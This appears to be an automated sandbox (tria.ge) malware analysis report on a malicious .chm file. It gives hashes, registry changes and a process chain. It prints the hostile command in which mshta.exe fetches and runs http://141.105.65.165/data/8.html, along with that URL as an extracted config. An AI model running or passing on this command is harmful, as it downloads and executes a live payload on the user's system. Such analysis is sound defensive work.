Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
79s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/04/2023, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
40d6b60a30a8ea1f2911efcef19487e0.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
40d6b60a30a8ea1f2911efcef19487e0.chm
Resource
win10v2004-20230220-en
General
-
Target
40d6b60a30a8ea1f2911efcef19487e0.chm
-
Size
100KB
-
MD5
40d6b60a30a8ea1f2911efcef19487e0
-
SHA1
78e65b1f2860db8a12630173faa98f2bc184a898
-
SHA256
ead97a3920ff557299bcd4ccde1770c759263b93b70414258ec9030bbd0cb750
-
SHA512
83f6d8f4836088d673f3da4e758af69cf9ebe4b1135a39070f0171ea39b57553c616821bc1d2233711ff7525a9ddefd85a5315da2ca11113ff6aa3f69780fbcf
-
SSDEEP
1536:4bGN5bBPms1O9bKgJPV/EUNN5AkqqZDa6UZrVutluxh1oj6y3uf+/XOtJAMS:tTEsE9GOpfN5ApqZmHrkOh1zyf/X71
Malware Config
Extracted
http://141.105.65.165/data/8.html
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 3416 mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\International\CpMRU hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Size = "10" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" hh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1612 hh.exe 1612 hh.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1612 wrote to memory of 3416 1612 hh.exe 85 PID 1612 wrote to memory of 3416 1612 hh.exe 85
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\40d6b60a30a8ea1f2911efcef19487e0.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/8.html ,2⤵
- Blocklisted process makes network request
PID:3416
-